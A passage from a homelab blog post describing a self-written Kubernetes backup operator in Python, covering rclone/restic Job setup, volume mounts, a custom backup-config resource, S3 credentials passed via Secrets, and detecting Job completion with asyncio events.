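import subprocess

def backup_bucket(bucket, scratch_dir, restic_repo):
    local_dir = os.path.join(scratch_dir, bucket)
    # Fetch the service&#39;s S3 bucket onto the local scratch volume.
    subprocess.run([&#34;rclone&#34;, &#34;sync&#34;, f&#34;svc-s3:{bucket}&#34;, local_dir], check=True)
    # Back up the downloaded data into the restic repo, e.g.
    # &#34;s3:https://s3-k8s.mei-home.net:443/some-backup-bucket&#34;.
    subprocess.run([&#34;restic&#34;, &#34;-r&#34;, restic_repo, &#34;backup&#34;, local_dir], check=True)
</code></pre>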
<p>The volume mounts look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span><span style="color:#e6db74">&#34;volumeMounts&#34;</span><span style="color:#960050;background-color:#1e0010">:</span> [
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;mountPath&#34;</span>: <span style="color:#e6db74">&#34;/hlsb-mounts/audiobookshelf-abs-data-volume&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;vol-backup-audiobookshelf-abs-data-volume&#34;</span>
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;mountPath&#34;</span>: <span style="color:#e6db74">&#34;/hlsb-mounts&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;vol-backup-confmap&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;readOnly&#34;</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>]
</span></span></code></pre></div><p>All mounts are done into the <code>/hlsb-mounts</code> directory in the container, which
is then used by hn-backup to construct the paths to be backed up.</p>
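<p>Constructing those mounts in the operator is, again, mostly value assignments. Here&rsquo;s
a rough sketch (not the actual code), assuming the mount directory is derived from the
PVC&rsquo;s namespace and name as in the example above:</p>
<pre tabindex="0"><code>from kubernetes_asyncio.client import V1VolumeMount

def create_backup_volume_mounts(pvc_namespace, pvc_name):
    return [
        # The data volume, mounted below /hlsb-mounts.
        V1VolumeMount(
            mount_path=f&#34;/hlsb-mounts/{pvc_namespace}-{pvc_name}&#34;,
            name=f&#34;vol-backup-{pvc_namespace}-{pvc_name}&#34;,
        ),
        # The per-Job config file from the ConfigMap, mounted read-only.
        V1VolumeMount(
            mount_path=&#34;/hlsb-mounts&#34;,
            name=&#34;vol-backup-confmap&#34;,
            read_only=True,
        ),
    ]
</code></pre>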
<p>Then there are the env variables. Those I use to define the common configuration:
while the ConfigMap contains options relevant only for the current Job, the env
variables contain the configs shared by all backup Jobs.
These options are defined in the HomelabBackupConfig CRD, an example of which
would look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">mei-home.net/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">HomelabBackupConfig</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">backup-config</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">backups</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">hlbo</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serviceBackup</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">schedule</span>: <span style="color:#e6db74">&#34;30 1 * * *&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">scratchVol</span>: <span style="color:#ae81ff">vol-service-backup-scratch</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">s3BackupConfig</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">s3Host</span>: <span style="color:#ae81ff">s3-k8s.mei-home.net:443</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">s3Credentials</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretName</span>: <span style="color:#ae81ff">s3-backup-buckets-cred</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">accessKeyIDProperty</span>: <span style="color:#ae81ff">AccessKey</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyProperty</span>: <span style="color:#ae81ff">SecretKey</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">s3ServiceConfig</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">s3Host</span>: <span style="color:#ae81ff">s3-k8s.mei-home.net:443</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">s3Credentials</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretName</span>: <span style="color:#ae81ff">s3-backup-buckets-cred</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">accessKeyIDProperty</span>: <span style="color:#ae81ff">AccessKey</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyProperty</span>: <span style="color:#ae81ff">SecretKey</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resticPasswordSecret</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secretName</span>: <span style="color:#ae81ff">restic-pw</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secretKey</span>: <span style="color:#ae81ff">pw</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resticRetentionPolicy</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">daily</span>: <span style="color:#ae81ff">7</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">weekly</span>: <span style="color:#ae81ff">6</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">monthly</span>: <span style="color:#ae81ff">6</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">yearly</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">jobSpec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">jobNS</span>: <span style="color:#e6db74">&#34;backups&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">image</span>: <span style="color:#ae81ff">harbor.mei-home.net/homelab/hn-backup:5.0.0</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">command</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#e6db74">&#34;hn-backup&#34;</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#e6db74">&#34;kube-services&#34;</span>
</span></span></code></pre></div><p>This CRD describes options common to all backups, so they don&rsquo;t need to be
repeated in every HomelabServiceBackup manifest.
The most important parts here are the configs for S3 access.</p>
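<p>As an aside: fetching this CRD from the operator works like for any other custom
resource. Here&rsquo;s a rough sketch using the kubernetes_asyncio client, where the plural
name <code>homelabbackupconfigs</code> is an assumption:</p>
<pre tabindex="0"><code>from kubernetes_asyncio import client, config

async def load_backup_config():
    await config.load_kube_config()  # inside the cluster: config.load_incluster_config()
    async with client.ApiClient() as api:
        custom = client.CustomObjectsApi(api)
        obj = await custom.get_namespaced_custom_object(
            group=&#34;mei-home.net&#34;,
            version=&#34;v1alpha1&#34;,
            namespace=&#34;backups&#34;,
            plural=&#34;homelabbackupconfigs&#34;,
            name=&#34;backup-config&#34;,
        )
    return obj[&#34;spec&#34;][&#34;serviceBackup&#34;]
</code></pre>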
<p><code>s3BackupConfig</code> describes access to the backup buckets to which restic will
write the backup. It contains the host, optionally with port, and how to get
the S3 credentials. It was very important to me here to be able to specify not just
the name of the Secret, but also the key inside the Secret to use for each specific
credential, because I&rsquo;ve been pretty annoyed by Helm charts which only allow
specifying the Secret&rsquo;s name and then expect certain keys to exist. That makes using
generated Secrets, like those created by Ceph Rook for S3 buckets, a real pain.</p>
<p>The <code>s3ServiceConfig</code> has exactly the same structure, but provides the
credentials for access to buckets used by services, which might also be backed
up, and which might live on a completely different system. This is the case for
my Nomad cluster apps right now, for example. Their S3 buckets still live on the
baremetal Ceph cluster, while the backup buckets have already been migrated to
the Ceph Rook cluster. And I decided to make such a setup possible here as well,
just in case I wanted to migrate to a different S3 setup at some point.</p>
<p>The <code>resticPasswordSecret</code> describes the encryption password for the restic
backup repos in the individual S3 buckets.</p>
<p>All of this information is put into environment variables on the Pod running
the backup. Let&rsquo;s start with the backup credentials:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;HLSB_S3_BACKUP_HOST&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;value&#34;</span>: <span style="color:#e6db74">&#34;s3-k8s.mei-home.net:443&#34;</span>
</span></span><span style="display:flex;"><span>}<span style="color:#960050;background-color:#1e0010">,</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;HLSB_S3_BACKUP_ACCESS_KEY_ID&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;valueFrom&#34;</span>: {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;secretKeyRef&#34;</span>: {
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;key&#34;</span>: <span style="color:#e6db74">&#34;AccessKey&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;s3-backup-buckets-cred&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;optional&#34;</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>}<span style="color:#960050;background-color:#1e0010">,</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;HLSB_S3_BACKUP_SECRET_KEY&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;valueFrom&#34;</span>: {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;secretKeyRef&#34;</span>: {
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;key&#34;</span>: <span style="color:#e6db74">&#34;SecretKey&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;s3-backup-buckets-cred&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;optional&#34;</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>}<span style="color:#960050;background-color:#1e0010">,</span>
</span></span></code></pre></div><p>The configs for the S3 service bucket credentials are very similar, so I won&rsquo;t
repeat them here.
One noteworthy thing about the above setup, especially for the Secrets: The
ServiceAccount for the operator does not require access to any Secrets in
its namespace. Of course, that&rsquo;s a bit cosmetic, because the operator is
allowed to launch Jobs, which in turn can access the Secrets. But still,
I found it nice that due to the way I&rsquo;d set things up, the operator itself
would not need to touch any Secrets.</p>
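<p>Building those env vars from the <code>s3Credentials</code> block of the CRD is
straightforward. Here&rsquo;s a sketch with a hypothetical helper name, the field names
mirroring the CRD shown above:</p>
<pre tabindex="0"><code>from kubernetes_asyncio.client import V1EnvVar, V1EnvVarSource, V1SecretKeySelector

def create_s3_credential_env(prefix, s3_credentials):
    # s3_credentials is e.g. spec.serviceBackup.s3BackupConfig.s3Credentials.
    def from_secret(key_property):
        return V1EnvVarSource(secret_key_ref=V1SecretKeySelector(
            name=s3_credentials[&#34;secretName&#34;],
            key=s3_credentials[key_property],
            optional=False,
        ))

    return [
        V1EnvVar(name=f&#34;{prefix}_ACCESS_KEY_ID&#34;,
                 value_from=from_secret(&#34;accessKeyIDProperty&#34;)),
        V1EnvVar(name=f&#34;{prefix}_SECRET_KEY&#34;,
                 value_from=from_secret(&#34;secretKeyProperty&#34;)),
    ]
</code></pre>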
<p>More interesting might be some odds and ends I&rsquo;ve also defined in env variables,
just to make accessing them more convenient.
To my shame, I have to admit that I lied above, when I pretended that I had a
clean separation between generic config going into environment variables and
per-Job configs going into the config file. One piece of per-Job info did end
up in the environment variables: the name of the backup bucket. And I have
absolutely no idea why I decided to go inconsistent with just this one value.</p>
<p>Some other interesting variables:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;HLSB_S3_SCRATCH_VOL_DIR&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;value&#34;</span>: <span style="color:#e6db74">&#34;/hlsb-mounts/backup-s3-scratch&#34;</span>
</span></span><span style="display:flex;"><span>}<span style="color:#960050;background-color:#1e0010">,</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;HLSB_VOL_MOUNT_DIR&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;value&#34;</span>: <span style="color:#e6db74">&#34;/hlsb-mounts&#34;</span>
</span></span><span style="display:flex;"><span>}<span style="color:#960050;background-color:#1e0010">,</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;HLSB_NAME&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;value&#34;</span>: <span style="color:#e6db74">&#34;backup-audiobookshelf&#34;</span>
</span></span><span style="display:flex;"><span>}<span style="color:#960050;background-color:#1e0010">,</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;HLSB_NS&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;value&#34;</span>: <span style="color:#e6db74">&#34;audiobookshelf&#34;</span>
</span></span><span style="display:flex;"><span>}<span style="color:#960050;background-color:#1e0010">,</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;HLSB_CONFIG&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;value&#34;</span>: <span style="color:#e6db74">&#34;/hlsb-mounts/hlsb-conf.yaml&#34;</span>
</span></span><span style="display:flex;"><span>}<span style="color:#960050;background-color:#1e0010">,</span>
</span></span></code></pre></div><p>These provide convenient access to the S3 scratch volume, which is used by
rclone for downloading an entire S3 bucket, which is then backed up by restic.
The HLSB&rsquo;s name and namespace also ended up being convenient to have available
in the Pod, if only for some meaningful log outputs. And finally it&rsquo;s nice to
have the path to the config file available as well.</p>
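<p>On the hn-backup side, picking these up is as boring as you&rsquo;d expect (a sketch,
not the actual code):</p>
<pre tabindex="0"><code>import os

config_path = os.environ[&#34;HLSB_CONFIG&#34;]            # /hlsb-mounts/hlsb-conf.yaml
mount_dir = os.environ[&#34;HLSB_VOL_MOUNT_DIR&#34;]       # /hlsb-mounts
scratch_dir = os.environ[&#34;HLSB_S3_SCRATCH_VOL_DIR&#34;]
print(f&#34;Backing up {os.environ[&#39;HLSB_NS&#39;]}/{os.environ[&#39;HLSB_NAME&#39;]}&#34;)
</code></pre>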
<p>And that&rsquo;s it - that&rsquo;s the entire Job. I&rsquo;ve long thought about providing some
code snippets used for creating the <a href="https://kubernetes-asyncio.readthedocs.io/en/latest/kubernetes_asyncio.client.models.v1_job.html">V1Job</a>,
but honestly, it&rsquo;s just not very interesting. It took me a while to get right,
but in the end it was all just value assignments.
Here&rsquo;s an example, the function which creates the Pod Volume spec for the
scratch volume:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">create_s3_scratch_volume</span>(backup_conf_spec):
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> <span style="color:#e6db74">&#34;scratchVol&#34;</span> <span style="color:#f92672">not</span> <span style="color:#f92672">in</span> backup_conf_spec:
</span></span><span style="display:flex;"><span>        logging<span style="color:#f92672">.</span>error(<span style="color:#e6db74">&#34;Did not find scratchVol in backup config.&#34;</span>)
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> <span style="color:#66d9ef">None</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    pvc <span style="color:#f92672">=</span> V1PersistentVolumeClaimVolumeSource(
</span></span><span style="display:flex;"><span>        claim_name<span style="color:#f92672">=</span>backup_conf_spec[<span style="color:#e6db74">&#34;scratchVol&#34;</span>], read_only<span style="color:#f92672">=</span><span style="color:#66d9ef">False</span>)
</span></span><span style="display:flex;"><span>    volume <span style="color:#f92672">=</span> V1Volume(name<span style="color:#f92672">=</span>S3_SCRATCH_VOL_NAME,
</span></span><span style="display:flex;"><span>                      persistent_volume_claim<span style="color:#f92672">=</span>pvc)
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> volume
</span></span></code></pre></div><p>The <code>backup_conf_spec</code> here is the <code>spec.serviceBackup</code> object from the
HomelabBackupConfig I&rsquo;ve shown above. And the rest of the roughly 630 lines it
took me to create the V1Job programmatically look very similar, perhaps
with the occasional <code>if</code> thrown in, but mostly just value assignments and logs.</p>
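<p>For context, the snippet above relies on a couple of imports and a module-level
constant defined elsewhere in the file, roughly like this (the constant&rsquo;s value here
is just a placeholder):</p>
<pre tabindex="0"><code>import logging

from kubernetes_asyncio.client import V1PersistentVolumeClaimVolumeSource, V1Volume

# Name under which the S3 scratch volume is attached to the backup Pod.
S3_SCRATCH_VOL_NAME = &#34;vol-backup-s3-scratch&#34;
</code></pre>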
<p>And because I&rsquo;m a kind man, I will spare you all of it.</p>
<p>But I still want to show you some code I think could be interesting, so let&rsquo;s
jump to the Job execution.</p>
<h3 id="job-execution">Job execution</h3>
<p>The Job itself will get submitted via the Python API again, nothing special
here. But what is special: The current daemon (Kopf&rsquo;s nomenclature for a
long-running change handler that doesn&rsquo;t just run to completion for a specific event)
needs to know when the current Job has finished, in whatever way. For this I decided
to make use of the fact that I was writing asynchronous code: while the
daemon waits for the Job to finish, it should yield. And luckily, Kopf
already provides a way to watch events from any k8s object type you might
be interested in. So I set up a watcher for events from Jobs:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#a6e22e">@kopf.on.event</span>(<span style="color:#e6db74">&#39;jobs&#39;</span>, labels<span style="color:#f92672">=</span>{<span style="color:#e6db74">&#39;homelab/part-of&#39;</span>: <span style="color:#e6db74">&#39;hlsb&#39;</span>})
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">job_event_handler</span>(type, status, labels, <span style="color:#f92672">**</span>kwargs):
</span></span><span style="display:flex;"><span>    jobs<span style="color:#f92672">.</span>handle_job_events(type, status, labels)
</span></span></code></pre></div><p>This filters for the events of all Jobs with the <code>homelab/part-of: hlsb</code> label.</p>
<p>The actual handling of events then happens in this function:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">handle_job_events</span>(type, status, labels):
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> type <span style="color:#f92672">in</span> [<span style="color:#e6db74">&#34;None&#34;</span>, <span style="color:#e6db74">&#34;DELETED&#34;</span>, <span style="color:#66d9ef">None</span>]:
</span></span><span style="display:flex;"><span>        logging<span style="color:#f92672">.</span>debug(
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Ignored job event:</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">Status: </span><span style="color:#e6db74">{</span>status<span style="color:#e6db74">}</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">Labels: </span><span style="color:#e6db74">{</span>labels<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> <span style="color:#e6db74">&#34;hlsb&#34;</span> <span style="color:#f92672">not</span> <span style="color:#f92672">in</span> labels:
</span></span><span style="display:flex;"><span>        logging<span style="color:#f92672">.</span>error(
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;Got event without hlsb label:&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">+</span> <span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">Status: </span><span style="color:#e6db74">{</span>status<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">+</span> <span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">Labels: </span><span style="color:#e6db74">{</span>labels<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">else</span>:
</span></span><span style="display:flex;"><span>        ns, name <span style="color:#f92672">=</span> labels[<span style="color:#e6db74">&#34;hlsb&#34;</span>]<span style="color:#f92672">.</span>split(<span style="color:#e6db74">&#34;_&#34;</span>)
</span></span><span style="display:flex;"><span>        job_state <span style="color:#f92672">=</span> get_job_state(status)
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> job_state <span style="color:#f92672">in</span> [JobState<span style="color:#f92672">.</span>COMPLETE, JobState<span style="color:#f92672">.</span>FAILED]:
</span></span><span style="display:flex;"><span>            logging<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Found finished job for </span><span style="color:#e6db74">{</span>ns<span style="color:#e6db74">}</span><span style="color:#e6db74">/</span><span style="color:#e6db74">{</span>name<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>            set_job_finished_event(ns, name)
</span></span></code></pre></div><p>This function only concerns itself with failed or completed jobs. And if it
finds such a job, it sets a &ldquo;Job finished&rdquo; event. These events are part of the
Python standard library&rsquo;s async synchronization primitives, see <a href="https://docs.python.org/3/library/asyncio-sync.html#asyncio.Event">here</a>.
They&rsquo;re awaitable objects, where the coroutine waiting on an event can be
woken up by executing the <code>event.set</code> method. And that&rsquo;s what happens in the
<code>set_job_finished_event</code> function called when the Job has been detected as
finished.</p>
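<p>The bookkeeping around those events looks roughly like this; a sketch, with the
dictionary and function names made up:</p>
<pre tabindex="0"><code>import asyncio

# One Event per HomelabServiceBackup, keyed by &#34;namespace/name&#34;.
job_finished_events = {}

def set_job_finished_event(ns, name):
    # Called from the Job event handler once the Job is Complete or Failed.
    job_finished_events[f&#34;{ns}/{name}&#34;].set()

async def wait_for_job(ns, name):
    # The daemon creates the Event before launching the Job and then yields
    # here until the watcher sets it.
    event = job_finished_events.setdefault(f&#34;{ns}/{name}&#34;, asyncio.Event())
    await event.wait()
</code></pre>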
<p>So how to determine whether a k8s Job has finished, failed or is still running?
Took me a while to figure out, but the safest way seems to be to look at the
<code>Job.status.conditions</code> array. If the <code>status</code> doesn&rsquo;t have that member at all,
it&rsquo;s a pretty good bet that the Job is running or pending.
Then you can iterate over the conditions, and if the given condition has <code>type</code>
<code>Failed</code> and <code>status</code> <code>True</code>, the Job has failed. Likewise, if <code>type</code> is <code>Complete</code>
and <code>status</code> is <code>True</code>, the Job has completed successfully. Here&rsquo;s an example:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span><span style="color:#e6db74">&#34;conditions&#34;</span><span style="color:#960050;background-color:#1e0010">:</span> [
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;lastProbeTime&#34;</span>: <span style="color:#e6db74">&#34;2025-01-10T01:30:23Z&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;lastTransitionTime&#34;</span>: <span style="color:#e6db74">&#34;2025-01-10T01:30:23Z&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;status&#34;</span>: <span style="color:#e6db74">&#34;True&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;type&#34;</span>: <span style="color:#e6db74">&#34;Complete&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>]
</span></span></code></pre></div><p>And here&rsquo;s how that looks in Python:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">get_job_state</span>(job_status):
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> <span style="color:#e6db74">&#34;conditions&#34;</span> <span style="color:#f92672">not</span> <span style="color:#f92672">in</span> job_status <span style="color:#f92672">or</span> <span style="color:#f92672">not</span> job_status[<span style="color:#e6db74">&#34;conditions&#34;</span>]:
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> JobState<span style="color:#f92672">.</span>RUNNING
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">for</span> cond <span style="color:#f92672">in</span> job_status[<span style="color:#e6db74">&#34;conditions&#34;</span>]:
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> cond[<span style="color:#e6db74">&#34;type&#34;</span>] <span style="color:#f92672">==</span> <span style="color:#e6db74">&#34;Failed&#34;</span> <span style="color:#f92672">and</span> cond[<span style="color:#e6db74">&#34;status&#34;</span>] <span style="color:#f92672">==</span> <span style="color:#e6db74">&#34;True&#34;</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">return</span> JobState<span style="color:#f92672">.</span>FAILED
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">elif</span> cond[<span style="color:#e6db74">&#34;type&#34;</span>] <span style="color:#f92672">==</span> <span style="color:#e6db74">&#34;Complete&#34;</span> <span style="color:#f92672">and</span> cond[<span style="color:#e6db74">&#34;status&#34;</span>] <span style="color:#f92672">==</span> <span style="color:#e6db74">&#34;True&#34;</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">return</span> JobState<span style="color:#f92672">.</span>COMPLETE
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> JobState<span style="color:#f92672">.</span>RUNNING
</span></span></code></pre></div><h2 id="conclusion">Conclusion</h2>
<p>And that&rsquo;s it. To be completely honest, this is the third time I&rsquo;m typing this
conclusion, and I almost <code>rm -rf</code>&rsquo;d this post multiple times. I don&rsquo;t think
it&rsquo;s that good or engaging. It seems I&rsquo;m just not that good at writing programming
blog posts. I hope those of you who made it to this point still got something
out of it.</p>
<p>So, time to do a recap: What did this bring me? And was it a good idea?
It all started out with my burning wish to just copy+paste my backup mechanism
from Nomad to Kubernetes, more-or-less verbatim. Add to that the fact that I
don&rsquo;t get to do much programming at $dayjob, and I was just missing it a bit.
Honestly, if someone were to ask me &ldquo;What&rsquo;s your most-used programming language?&rdquo;,
my honest answer would need to be &ldquo;Whatever Atlassian calls JIRA&rsquo;s markup language.&rdquo;</p>
<p>But I also learned quite a bit. I had never really worked with the k8s API
before, and this was a good way to dive deeper into it. Although I&rsquo;m not really
convinced that knowing I&rsquo;m able to write small operators isn&rsquo;t just a tad bit
dangerous. &#x1f62c;</p>
<p>My first commit to the repo was on May 9th, 2024. Adding it all up, this took
me nine months to do. With rather long interruptions at times, but most of those
were more due to motivation than anything else. If I had just used something
existing, I would have the k8s migration done by now. But where&rsquo;s the fun in
that?</p>
<p>There&rsquo;s still a lot I would like to refactor in the implementation. For example,
those of you who know the k8s API probably wondered why I went with async events
instead of just creating a &ldquo;watch&rdquo; on the Jobs and waiting for them to finish that way. I&rsquo;m
honestly not sure. But I would like to dive into k8s API watches.
Then there&rsquo;s the unit test code. There&rsquo;s so much repetition in those tests,
and especially in the mocks. And there are still a lot of hardcoded constants in
